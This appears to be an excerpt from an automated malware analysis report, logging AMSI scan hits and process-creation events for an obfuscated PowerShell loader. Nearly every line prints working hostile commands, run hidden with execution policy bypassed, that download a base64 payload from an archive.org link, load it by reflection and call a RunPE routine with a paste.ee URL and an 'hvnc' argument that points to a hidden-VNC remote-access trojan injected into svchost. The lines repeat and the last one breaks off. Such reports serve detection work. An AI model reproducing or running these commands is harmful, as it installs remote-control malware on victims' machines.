[system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD$global:?
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Anti Malware Scan Interface: $Codigo = 'KCgnTnJYdXJsJysnID0nKycgWicrJ0hvJysnaHQnKyd0cHM6Ly8nKydpYTYwMCcrJzEwJysnMC51cy5hcmNoJysnaXYnKydlLicrJ29yZy8yNC8nKydpdCcrJ2Vtcy9kZXRhJysnaC1uJysnb3RlLXYvRCcrJ2UnKyd0YWhOb3RlVicrJy50eCcrJ3RaSG87TnJYJysnYmEnKydzZTY0Q29udGVuJysndCA9IChOZXctT2JqZWN0IFN5c3RlbS4nKydOZXQuV2ViQycrJ2xpZScrJ250KS5Eb3dubG9hZCcrJ1N0cmluZyhOclh1cmwnKycpO05yJysnWCcrJ2JpJysnbicrJ2FyJysneUNvbnRlbicrJ3QgPScrJyBbU3lzdGVtLkNvbnZlcnRdOjpGcm9tQmFzZScrJzY0UycrJ3RyJysnaW4nKydnKE5yWGJhcycrJ2U2NEMnKydvbicrJ3RlbicrJ3QpO05yWGFzc2VtYmx5ID0gJysnW1JlZmxlYycrJ3Rpb24uJysnQScrJ3NzZW1ibHldOicrJzpMJysnb2FkKCcrJ05yJysnWGJpbmFyJysneUMnKydvbnQnKydlbnQpJysnOycrJ05yWCcrJ3R5cCcrJ2UnKycgPScrJyBOclhhc3NlbWJsJysneS5HZXRUeXBlKFpIbycrJ1J1blBFLkhvbWVaSG8pO05yWCcrJ20nKydldGhvZCA9ICcrJ04nKydyWHQnKyd5cGUuRycrJ2V0TScrJ2V0aG9kJysnKFpIJysnb1ZBSVpIbyk7TicrJ3InKydYbWV0aCcrJ29kLicrJ0luJysndm9rZShOcicrJ1huJysndScrJ2xsLCBbb2JqZWN0W11dQChaSG8wL0U3TycrJzI4L2QvZWUuJysnZXRzYXAvLzpzcHR0aFpIJysnbyAsJysnICcrJ1pIbzFaSG8nKycgLCBaSG9DOk93R1BybycrJ2dyYW1EYScrJ3RhJysnTycrJ3dHWkgnKydvICwgWkhvaHZuY1onKydIbywnKydaJysnSG9zdicrJ2Nob3N0WkhvLFpIb1pIbyknKycpJykgLWNyZXBMYWNlICAoW2NoQVJdOTArW2NoQVJdNzIrW2NoQVJdMTExKSxbY2hBUl0zOS1yZVBsQUNlJ093RycsW2NoQVJdOTItcmVQbEFDZSAoW2NoQVJdNzgrW2NoQVJdMTE0K1tjaEFSXTg4KSxbY2hBUl0zNil8aW52T0tlLWV4UFJlU1NpT04=';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD$global:?
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Anti Malware Scan Interface: $Codigo = 'KCgnTnJYdXJsJysnID0nKycgWicrJ0hvJysnaHQnKyd0cHM6Ly8nKydpYTYwMCcrJzEwJysnMC51cy5hcmNoJysnaXYnKydlLicrJ29yZy8yNC8nKydpdCcrJ2Vtcy9kZXRhJysnaC1uJysnb3RlLXYvRCcrJ2UnKyd0YWhOb3RlVicrJy50eCcrJ3RaSG87TnJYJysnYmEnKydzZTY0Q29udGVuJysndCA9IChOZXctT2JqZWN0IFN5c3RlbS4nKydOZXQuV2ViQycrJ2xpZScrJ250KS5Eb3dubG9hZCcrJ1N0cmluZyhOclh1cmwnKycpO05yJysnWCcrJ2JpJysnbicrJ2FyJysneUNvbnRlbicrJ3QgPScrJyBbU3lzdGVtLkNvbnZlcnRdOjpGcm9tQmFzZScrJzY0UycrJ3RyJysnaW4nKydnKE5yWGJhcycrJ2U2NEMnKydvbicrJ3RlbicrJ3QpO05yWGFzc2VtYmx5ID0gJysnW1JlZmxlYycrJ3Rpb24uJysnQScrJ3NzZW1ibHldOicrJzpMJysnb2FkKCcrJ05yJysnWGJpbmFyJysneUMnKydvbnQnKydlbnQpJysnOycrJ05yWCcrJ3R5cCcrJ2UnKycgPScrJyBOclhhc3NlbWJsJysneS5HZXRUeXBlKFpIbycrJ1J1blBFLkhvbWVaSG8pO05yWCcrJ20nKydldGhvZCA9ICcrJ04nKydyWHQnKyd5cGUuRycrJ2V0TScrJ2V0aG9kJysnKFpIJysnb1ZBSVpIbyk7TicrJ3InKydYbWV0aCcrJ29kLicrJ0luJysndm9rZShOcicrJ1huJysndScrJ2xsLCBbb2JqZWN0W11dQChaSG8wL0U3TycrJzI4L2QvZWUuJysnZXRzYXAvLzpzcHR0aFpIJysnbyAsJysnICcrJ1pIbzFaSG8nKycgLCBaSG9DOk93R1BybycrJ2dyYW1EYScrJ3RhJysnTycrJ3dHWkgnKydvICwgWkhvaHZuY1onKydIbywnKydaJysnSG9zdicrJ2Nob3N0WkhvLFpIb1pIbyknKycpJykgLWNyZXBMYWNlICAoW2NoQVJdOTArW2NoQVJdNzIrW2NoQVJdMTExKSxbY2hBUl0zOS1yZVBsQUNlJ093RycsW2NoQVJdOTItcmVQbEFDZSAoW2NoQVJdNzgrW2NoQVJdMTE0K1tjaEFSXTg4KSxbY2hBUl0zNil8aW52T0tlLWV4UFJlU1NpT04=';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD$global:?
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Anti Malware Scan Interface: $Codigo = 'KCgnTnJYdXJsJysnID0nKycgWicrJ0hvJysnaHQnKyd0cHM6Ly8nKydpYTYwMCcrJzEwJysnMC51cy5hcmNoJysnaXYnKydlLicrJ29yZy8yNC8nKydpdCcrJ2Vtcy9kZXRhJysnaC1uJysnb3RlLXYvRCcrJ2UnKyd0YWhOb3RlVicrJy50eCcrJ3RaSG87TnJYJysnYmEnKydzZTY0Q29udGVuJysndCA9IChOZXctT2JqZWN0IFN5c3RlbS4nKydOZXQuV2ViQycrJ2xpZScrJ250KS5Eb3dubG9hZCcrJ1N0cmluZyhOclh1cmwnKycpO05yJysnWCcrJ2JpJysnbicrJ2FyJysneUNvbnRlbicrJ3QgPScrJyBbU3lzdGVtLkNvbnZlcnRdOjpGcm9tQmFzZScrJzY0UycrJ3RyJysnaW4nKydnKE5yWGJhcycrJ2U2NEMnKydvbicrJ3RlbicrJ3QpO05yWGFzc2VtYmx5ID0gJysnW1JlZmxlYycrJ3Rpb24uJysnQScrJ3NzZW1ibHldOicrJzpMJysnb2FkKCcrJ05yJysnWGJpbmFyJysneUMnKydvbnQnKydlbnQpJysnOycrJ05yWCcrJ3R5cCcrJ2UnKycgPScrJyBOclhhc3NlbWJsJysneS5HZXRUeXBlKFpIbycrJ1J1blBFLkhvbWVaSG8pO05yWCcrJ20nKydldGhvZCA9ICcrJ04nKydyWHQnKyd5cGUuRycrJ2V0TScrJ2V0aG9kJysnKFpIJysnb1ZBSVpIbyk7TicrJ3InKydYbWV0aCcrJ29kLicrJ0luJysndm9rZShOcicrJ1huJysndScrJ2xsLCBbb2JqZWN0W11dQChaSG8wL0U3TycrJzI4L2QvZWUuJysnZXRzYXAvLzpzcHR0aFpIJysnbyAsJysnICcrJ1pIbzFaSG8nKycgLCBaSG9DOk93R1BybycrJ2dyYW1EYScrJ3RhJysnTycrJ3dHWkgnKydvICwgWkhvaHZuY1onKydIbywnKydaJysnSG9zdicrJ2Nob3N0WkhvLFpIb1pIbyknKycpJykgLWNyZXBMYWNlICAoW2NoQVJdOTArW2NoQVJdNzIrW2NoQVJdMTExKSxbY2hBUl0zOS1yZVBsQUNlJ093RycsW2NoQVJdOTItcmVQbEFDZSAoW2NoQVJdNzgrW2NoQVJdMTE0K1tjaEFSXTg4KSxbY2hBUl0zNil8aW52T0tlLWV4UFJlU1NpT04=';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD$global:?
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Anti Malware Scan Interface: $Codigo = 'KCgnezB9dXJsID0gezF9aHR0cHMnKyc6Ly9pYTYwJysnMDEwMC51cy5hcmNoaScrJ3ZlLm9yZycrJy8yNC9pJysndGVtcycrJy9kJysnZXQnKydhJysnaC1ub3RlLXYvRGV0YWgnKydOb3RlVicrJy50eHR7MX07ezAnKyd9YmFzZTY0Q28nKydudGVudCAnKyc9JysnICcrJyhOZXctT2InKydqZWN0IFN5Jysnc3QnKydlbS5OZScrJ3QuVycrJ2ViQ2xpZScrJ250KS4nKydEb3dubCcrJ29hZFN0JysncmluJysnZyh7MCcrJ30nKyd1cmwpO3snKycwfWJpbicrJ2FyJysneUNvbicrJ3RlbicrJ3QgPScrJyAnKydbU3lzdGVtLkNvbnZlcnRdJysnOjonKydGcm9tQmEnKydzZTY0U3RyaW5nKHswfWJhc2UnKyc2NENvbicrJ3RlbnQpO3swfWFzc2UnKydtYmwnKyd5ICcrJz0nKycgW1JlZmxlY3Rpb24uQXMnKydzJysnZW1ibHldOjonKydMbycrJ2FkKHswfWJpbmEnKydyeUNvbnRlbnQpO3swfXR5cCcrJ2UgJysnPSB7JysnMH0nKydhc3NlbScrJ2JseS5HZXRUJysneXAnKydlKHsxfVInKyd1blBFJysnLkhvJysnbWV7JysnMX0pO3swJysnfScrJ21lJysndGhvZCA9IHswfXR5cGUuR2V0TWV0aG9kKHsxfVZBJysnSXsxfScrJyk7ezB9JysnbScrJ2UnKyd0aCcrJ29kLkluJysndicrJ29rZSh7MH1udScrJ2xsLCBbb2JqZScrJ2N0WycrJ11dJysnQCh7MX0nKycwJysnL2dKMWsnKydTJysnL2QvJysnZWUuZScrJ3RzYXAvLzpzcHR0aHsxJysnfScrJyAsJysnIHsxfWRlJysnc2F0JysnaXZhZG97MScrJ30nKycgLCB7MScrJ31kZXNhdGl2YScrJ2QnKydvezF9ICwgezF9JysnZGUnKydzYXRpdmFkb3snKycxfSx7MX1DJysnYScrJ3NQbycrJ2x7MX0nKycsezEnKyd9eycrJzF9KSknKS1mICBbY2hBUl0zNixbY2hBUl0zOSkgfElleA==';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD$global:?
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Anti Malware Scan Interface: $Codigo = 'KCgnezB9dXJsID0gezF9aHR0cHMnKyc6Ly9pYTYwJysnMDEwMC51cy5hcmNoaScrJ3ZlLm9yZycrJy8yNC9pJysndGVtcycrJy9kJysnZXQnKydhJysnaC1ub3RlLXYvRGV0YWgnKydOb3RlVicrJy50eHR7MX07ezAnKyd9YmFzZTY0Q28nKydudGVudCAnKyc9JysnICcrJyhOZXctT2InKydqZWN0IFN5Jysnc3QnKydlbS5OZScrJ3QuVycrJ2ViQ2xpZScrJ250KS4nKydEb3dubCcrJ29hZFN0JysncmluJysnZyh7MCcrJ30nKyd1cmwpO3snKycwfWJpbicrJ2FyJysneUNvbicrJ3RlbicrJ3QgPScrJyAnKydbU3lzdGVtLkNvbnZlcnRdJysnOjonKydGcm9tQmEnKydzZTY0U3RyaW5nKHswfWJhc2UnKyc2NENvbicrJ3RlbnQpO3swfWFzc2UnKydtYmwnKyd5ICcrJz0nKycgW1JlZmxlY3Rpb24uQXMnKydzJysnZW1ibHldOjonKydMbycrJ2FkKHswfWJpbmEnKydyeUNvbnRlbnQpO3swfXR5cCcrJ2UgJysnPSB7JysnMH0nKydhc3NlbScrJ2JseS5HZXRUJysneXAnKydlKHsxfVInKyd1blBFJysnLkhvJysnbWV7JysnMX0pO3swJysnfScrJ21lJysndGhvZCA9IHswfXR5cGUuR2V0TWV0aG9kKHsxfVZBJysnSXsxfScrJyk7ezB9JysnbScrJ2UnKyd0aCcrJ29kLkluJysndicrJ29rZSh7MH1udScrJ2xsLCBbb2JqZScrJ2N0WycrJ11dJysnQCh7MX0nKycwJysnL2dKMWsnKydTJysnL2QvJysnZWUuZScrJ3RzYXAvLzpzcHR0aHsxJysnfScrJyAsJysnIHsxfWRlJysnc2F0JysnaXZhZG97MScrJ30nKycgLCB7MScrJ31kZXNhdGl2YScrJ2QnKydvezF9ICwgezF9JysnZGUnKydzYXRpdmFkb3snKycxfSx7MX1DJysnYScrJ3NQbycrJ2x7MX0nKycsezEnKyd9eycrJzF9KSknKS1mICBbY2hBUl0zNixbY2hBUl0zOSkgfElleA==';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD$global:?
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Anti Malware Scan Interface: $Codigo = 'KCgnezB9dXJsID0gezF9aHR0cHMnKyc6Ly9pYTYwJysnMDEwMC51cy5hcmNoaScrJ3ZlLm9yZycrJy8yNC9pJysndGVtcycrJy9kJysnZXQnKydhJysnaC1ub3RlLXYvRGV0YWgnKydOb3RlVicrJy50eHR7MX07ezAnKyd9YmFzZTY0Q28nKydudGVudCAnKyc9JysnICcrJyhOZXctT2InKydqZWN0IFN5Jysnc3QnKydlbS5OZScrJ3QuVycrJ2ViQ2xpZScrJ250KS4nKydEb3dubCcrJ29hZFN0JysncmluJysnZyh7MCcrJ30nKyd1cmwpO3snKycwfWJpbicrJ2FyJysneUNvbicrJ3RlbicrJ3QgPScrJyAnKydbU3lzdGVtLkNvbnZlcnRdJysnOjonKydGcm9tQmEnKydzZTY0U3RyaW5nKHswfWJhc2UnKyc2NENvbicrJ3RlbnQpO3swfWFzc2UnKydtYmwnKyd5ICcrJz0nKycgW1JlZmxlY3Rpb24uQXMnKydzJysnZW1ibHldOjonKydMbycrJ2FkKHswfWJpbmEnKydyeUNvbnRlbnQpO3swfXR5cCcrJ2UgJysnPSB7JysnMH0nKydhc3NlbScrJ2JseS5HZXRUJysneXAnKydlKHsxfVInKyd1blBFJysnLkhvJysnbWV7JysnMX0pO3swJysnfScrJ21lJysndGhvZCA9IHswfXR5cGUuR2V0TWV0aG9kKHsxfVZBJysnSXsxfScrJyk7ezB9JysnbScrJ2UnKyd0aCcrJ29kLkluJysndicrJ29rZSh7MH1udScrJ2xsLCBbb2JqZScrJ2N0WycrJ11dJysnQCh7MX0nKycwJysnL2dKMWsnKydTJysnL2QvJysnZWUuZScrJ3RzYXAvLzpzcHR0aHsxJysnfScrJyAsJysnIHsxfWRlJysnc2F0JysnaXZhZG97MScrJ30nKycgLCB7MScrJ31kZXNhdGl2YScrJ2QnKydvezF9ICwgezF9JysnZGUnKydzYXRpdmFkb3snKycxfSx7MX1DJysnYScrJ3NQbycrJ2x7MX0nKycsezEnKyd9eycrJzF9KSknKS1mICBbY2hBUl0zNixbY2hBUl0zOSkgfElleA==';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD$global:?
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Anti Malware Scan Interface: $Codigo = 'KCgnezB9dXJsID0gezF9aHR0cHMnKyc6Ly9pYTYwJysnMDEwMC51cy5hcmNoaScrJ3ZlLm9yZycrJy8yNC9pJysndGVtcycrJy9kJysnZXQnKydhJysnaC1ub3RlLXYvRGV0YWgnKydOb3RlVicrJy50eHR7MX07ezAnKyd9YmFzZTY0Q28nKydudGVudCAnKyc9JysnICcrJyhOZXctT2InKydqZWN0IFN5Jysnc3QnKydlbS5OZScrJ3QuVycrJ2ViQ2xpZScrJ250KS4nKydEb3dubCcrJ29hZFN0JysncmluJysnZyh7MCcrJ30nKyd1cmwpO3snKycwfWJpbicrJ2FyJysneUNvbicrJ3RlbicrJ3QgPScrJyAnKydbU3lzdGVtLkNvbnZlcnRdJysnOjonKydGcm9tQmEnKydzZTY0U3RyaW5nKHswfWJhc2UnKyc2NENvbicrJ3RlbnQpO3swfWFzc2UnKydtYmwnKyd5ICcrJz0nKycgW1JlZmxlY3Rpb24uQXMnKydzJysnZW1ibHldOjonKydMbycrJ2FkKHswfWJpbmEnKydyeUNvbnRlbnQpO3swfXR5cCcrJ2UgJysnPSB7JysnMH0nKydhc3NlbScrJ2JseS5HZXRUJysneXAnKydlKHsxfVInKyd1blBFJysnLkhvJysnbWV7JysnMX0pO3swJysnfScrJ21lJysndGhvZCA9IHswfXR5cGUuR2V0TWV0aG9kKHsxfVZBJysnSXsxfScrJyk7ezB9JysnbScrJ2UnKyd0aCcrJ29kLkluJysndicrJ29rZSh7MH1udScrJ2xsLCBbb2JqZScrJ2N0WycrJ11dJysnQCh7MX0nKycwJysnL2dKMWsnKydTJysnL2QvJysnZWUuZScrJ3RzYXAvLzpzcHR0aHsxJysnfScrJyAsJysnIHsxfWRlJysnc2F0JysnaXZhZG97MScrJ30nKycgLCB7MScrJ31kZXNhdGl2YScrJ2QnKydvezF9ICwgezF9JysnZGUnKydzYXRpdmFkb3snKycxfSx7MX1DJysnYScrJ3NQbycrJ2x7MX0nKycsezEnKyd9eycrJzF9KSknKS1mICBbY2hBUl0zNixbY2hBUl0zOSkgfElleA==';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD$global:?
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Anti Malware Scan Interface: $Codigo = 'KCgnezB9dXJsID0gezF9aHR0cHMnKyc6Ly9pYTYwJysnMDEwMC51cy5hcmNoaScrJ3ZlLm9yZycrJy8yNC9pJysndGVtcycrJy9kJysnZXQnKydhJysnaC1ub3RlLXYvRGV0YWgnKydOb3RlVicrJy50eHR7MX07ezAnKyd9YmFzZTY0Q28nKydudGVudCAnKyc9JysnICcrJyhOZXctT2InKydqZWN0IFN5Jysnc3QnKydlbS5OZScrJ3QuVycrJ2ViQ2xpZScrJ250KS4nKydEb3dubCcrJ29hZFN0JysncmluJysnZyh7MCcrJ30nKyd1cmwpO3snKycwfWJpbicrJ2FyJysneUNvbicrJ3RlbicrJ3QgPScrJyAnKydbU3lzdGVtLkNvbnZlcnRdJysnOjonKydGcm9tQmEnKydzZTY0U3RyaW5nKHswfWJhc2UnKyc2NENvbicrJ3RlbnQpO3swfWFzc2UnKydtYmwnKyd5ICcrJz0nKycgW1JlZmxlY3Rpb24uQXMnKydzJysnZW1ibHldOjonKydMbycrJ2FkKHswfWJpbmEnKydyeUNvbnRlbnQpO3swfXR5cCcrJ2UgJysnPSB7JysnMH0nKydhc3NlbScrJ2JseS5HZXRUJysneXAnKydlKHsxfVInKyd1blBFJysnLkhvJysnbWV7JysnMX0pO3swJysnfScrJ21lJysndGhvZCA9IHswfXR5cGUuR2V0TWV0aG9kKHsxfVZBJysnSXsxfScrJyk7ezB9JysnbScrJ2UnKyd0aCcrJ29kLkluJysndicrJ29rZSh7MH1udScrJ2xsLCBbb2JqZScrJ2N0WycrJ11dJysnQCh7MX0nKycwJysnL2dKMWsnKydTJysnL2QvJysnZWUuZScrJ3RzYXAvLzpzcHR0aHsxJysnfScrJyAsJysnIHsxfWRlJysnc2F0JysnaXZhZG97MScrJ30nKycgLCB7MScrJ31kZXNhdGl2YScrJ2QnKydvezF9ICwgezF9JysnZGUnKydzYXRpdmFkb3snKycxfSx7MX1DJysnYScrJ3NQbycrJ2x7MX0nKycsezEnKyd9eycrJzF9KSknKS1mICBbY2hBUl0zNixbY2hBUl0zOSkgfElleA==';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD$global:?
Obfuscated command line found
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('NrXurl'+' ='+' Z'+'Ho'+'ht'+'tps://'+'ia600'+'10'+'0.us.arch'+'iv'+'e.'+'org/24/'+'it'+'ems/deta'+'h-n'+'ote-v/D'+'e'+'tahNoteV'+'.tx'+'tZHo;NrX'+'ba'+'se64Conten'+'t = (New-Object System.'+'Net.WebC'+'lie'+'nt).Download'+'String(NrXurl'+');Nr'+'X'+'bi'+'n'+'ar'+'yConten'+'t ='+' [System.Convert]::FromBase'+'64S'+'tr'+'in'+'g(NrXbas'+'e64C'+'on'+'ten'+'t);NrXassembly = '+'[Reflec'+'tion.'+'A'+'ssembly]:'+':L'+'oad('+'Nr'+'Xbinar'+'yC'+'ont'+'ent)'+';'+'NrX'+'typ'+'e'+' ='+' NrXassembl'+'y.GetType(ZHo'+'RunPE.HomeZHo);NrX'+'m'+'ethod = '+'N'+'rXt'+'ype.G'+'etM'+'ethod'+'(ZH'+'oVAIZHo);N'+'r'+'Xmeth'+'od.'+'In'+'voke(Nr'+'Xn'+'u'+'ll, [object[]]@(ZHo0/E7O'+'28/d/ee.'+'etsap//:sptthZH'+'o ,'+' '+'ZHo1ZHo'+' , ZHoC:OwGPro'+'gramDa'+'ta'+'O'+'wGZH'+'o , ZHohvncZ'+'Ho,'+'Z'+'Hosv'+'chostZHo,ZHoZHo)'+')') -crepLace ([chAR]90+[chAR]72+[chAR]111),[chAR]39-rePlACe'OwG',[chAR]92-rePlACe ([chAR]78+[chAR]114+[chAR]88),[chAR]36)|invOKe-exPReSSiON"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('NrXurl'+' ='+' Z'+'Ho'+'ht'+'tps://'+'ia600'+'10'+'0.us.arch'+'iv'+'e.'+'org/24/'+'it'+'ems/deta'+'h-n'+'ote-v/D'+'e'+'tahNoteV'+'.tx'+'tZHo;NrX'+'ba'+'se64Conten'+'t = (New-Object System.'+'Net.WebC'+'lie'+'nt).Download'+'String(NrXurl'+');Nr'+'X'+'bi'+'n'+'ar'+'yConten'+'t ='+' [System.Convert]::FromBase'+'64S'+'tr'+'in'+'g(NrXbas'+'e64C'+'on'+'ten'+'t);NrXassembly = '+'[Reflec'+'tion.'+'A'+'ssembly]:'+':L'+'oad('+'Nr'+'Xbinar'+'yC'+'ont'+'ent)'+';'+'NrX'+'typ'+'e'+' ='+' NrXassembl'+'y.GetType(ZHo'+'RunPE.HomeZHo);NrX'+'m'+'ethod = '+'N'+'rXt'+'ype.G'+'etM'+'ethod'+'(ZH'+'oVAIZHo);N'+'r'+'Xmeth'+'od.'+'In'+'voke(Nr'+'Xn'+'u'+'ll, [object[]]@(ZHo0/E7O'+'28/d/ee.'+'etsap//:sptthZH'+'o ,'+' '+'ZHo1ZHo'+' , ZHoC:OwGPro'+'gramDa'+'ta'+'O'+'wGZH'+'o , ZHohvncZ'+'Ho,'+'Z'+'Hosv'+'chostZHo,ZHoZHo)'+')') -crepLace ([chAR]90+[chAR]72+[chAR]111),[chAR]39-rePlACe'OwG',[chAR]92-rePlACe ([chAR]78+[chAR]114+[chAR]88),[chAR]36)|invOKe-exPReSSiON"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('NrXurl'+' ='+' Z'+'Ho'+'ht'+'tps://'+'ia600'+'10'+'0.us.arch'+'iv'+'e.'+'org/24/'+'it'+'ems/deta'+'h-n'+'ote-v/D'+'e'+'tahNoteV'+'.tx'+'tZHo;NrX'+'ba'+'se64Conten'+'t = (New-Object System.'+'Net.WebC'+'lie'+'nt).Download'+'String(NrXurl'+');Nr'+'X'+'bi'+'n'+'ar'+'yConten'+'t ='+' [System.Convert]::FromBase'+'64S'+'tr'+'in'+'g(NrXbas'+'e64C'+'on'+'ten'+'t);NrXassembly = '+'[Reflec'+'tion.'+'A'+'ssembly]:'+':L'+'oad('+'Nr'+'Xbinar'+'yC'+'ont'+'ent)'+';'+'NrX'+'typ'+'e'+' ='+' NrXassembl'+'y.GetType(ZHo'+'RunPE.HomeZHo);NrX'+'m'+'ethod = '+'N'+'rXt'+'ype.G'+'etM'+'ethod'+'(ZH'+'oVAIZHo);N'+'r'+'Xmeth'+'od.'+'In'+'voke(Nr'+'Xn'+'u'+'ll, [object[]]@(ZHo0/E7O'+'28/d/ee.'+'etsap//:sptthZH'+'o ,'+' '+'ZHo1ZHo'+' , ZHoC:OwGPro'+'gramDa'+'ta'+'O'+'wGZH'+'o , ZHohvncZ'+'Ho,'+'Z'+'Hosv'+'chostZHo,ZHoZHo)'+')') -crepLace ([chAR]90+[chAR]72+[chAR]111),[chAR]39-rePlACe'OwG',[chAR]92-rePlACe ([chAR]78+[chAR]114+[chAR]88),[chAR]36)|invOKe-exPReSSiON"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('NrXurl'+' ='+' Z'+'Ho'+'ht'+'tps://'+'ia600'+'10'+'0.us.arch'+'iv'+'e.'+'org/24/'+'it'+'ems/deta'+'h-n'+'ote-v/D'+'e'+'tahNoteV'+'.tx'+'tZHo;NrX'+'ba'+'se64Conten'+'t = (New-Object System.'+'Net.WebC'+'lie'+'nt).Download'+'String(NrXurl'+');Nr'+'X'+'bi'+'n'+'ar'+'yConten'+'t ='+' [System.Convert]::FromBase'+'64S'+'tr'+'in'+'g(NrXbas'+'e64C'+'on'+'ten'+'t);NrXassembly = '+'[Reflec'+'tion.'+'A'+'ssembly]:'+':L'+'oad('+'Nr'+'Xbinar'+'yC'+'ont'+'ent)'+';'+'NrX'+'typ'+'e'+' ='+' NrXassembl'+'y.GetType(ZHo'+'RunPE.HomeZHo);NrX'+'m'+'ethod = '+'N'+'rXt'+'ype.G'+'etM'+'ethod'+'(ZH'+'oVAIZHo);N'+'r'+'Xmeth'+'od.'+'In'+'voke(Nr'+'Xn'+'u'+'ll, [object[]]@(ZHo0/E7O'+'28/d/ee.'+'etsap//:sptthZH'+'o ,'+' '+'ZHo1ZHo'+' , ZHoC:OwGPro'+'gramDa'+'ta'+'O'+'wGZH'+'o , ZHohvncZ'+'Ho,'+'Z'+'Hosv'+'chostZHo,ZHoZHo)'+')') -crepLace ([chAR]90+[chAR]72+[chAR]111),[chAR]39-rePlACe'OwG',[chAR]92-rePlACe ([chAR]78+[chAR]114+[chAR]88),[chAR]36)|invOKe-exPReSSiON"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('NrXurl'+' ='+' Z'+'Ho'+'ht'+'tps://'+'ia600'+'10'+'0.us.arch'+'iv'+'e.'+'org/24/'+'it'+'ems/deta'+'h-n'+'ote-v/D'+'e'+'tahNoteV'+'.tx'+'tZHo;NrX'+'ba'+'se64Conten'+'t = (New-Object System.'+'Net.WebC'+'lie'+'nt).Download'+'String(NrXurl'+');Nr'+'X'+'bi'+'n'+'ar'+'yConten'+'t ='+' [System.Convert]::FromBase'+'64S'+'tr'+'in'+'g(NrXbas'+'e64C'+'on'+'ten'+'t);NrXassembly = '+'[Reflec'+'tion.'+'A'+'ssembly]:'+':L'+'oad('+'Nr'+'Xbinar'+'yC'+'ont'+'ent)'+';'+'NrX'+'typ'+'e'+' ='+' NrXassembl'+'y.GetType(ZHo'+'RunPE.HomeZHo);NrX'+'m'+'ethod = '+'N'+'rXt'+'ype.G'+'etM'+'ethod'+'(ZH'+'oVAIZHo);N'+'r'+'Xmeth'+'od.'+'In'+'voke(Nr'+'Xn'+'u'+'ll, [object[]]@(ZHo0/E7O'+'28/d/ee.'+'etsap//:sptthZH'+'o ,'+' '+'ZHo1ZHo'+' , ZHoC:OwGPro'+'gramDa'+'ta'+'O'+'wGZH'+'o , ZHohvncZ'+'Ho,'+'Z'+'Hosv'+'chostZHo,ZHoZHo)'+')') -crepLace ([chAR]90+[chAR]72+[chAR]111),[chAR]39-rePlACe'OwG',[chAR]92-rePlACe ([chAR]78+[chAR]114+[chAR]88),[chAR]36)|invOKe-exPReSSiON"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('NrXurl'+' ='+' Z'+'Ho'+'ht'+'tps://'+'ia600'+'10'+'0.us.arch'+'iv'+'e.'+'org/24/'+'it'+'ems/deta'+'h-n'+'ote-v/D'+'e'+'tahNoteV'+'.tx'+'tZHo;NrX'+'ba'+'se64Conten'+'t = (New-Object System.'+'Net.WebC'+'lie'+'nt).Download'+'String(NrXurl'+');Nr'+'X'+'bi'+'n'+'ar'+'yConten'+'t ='+' [System.Convert]::FromBase'+'64S'+'tr'+'in'+'g(NrXbas'+'e64C'+'on'+'ten'+'t);NrXassembly = '+'[Reflec'+'tion.'+'A'+'ssembly]:'+':L'+'oad('+'Nr'+'Xbinar'+'yC'+'ont'+'ent)'+';'+'NrX'+'typ'+'e'+' ='+' 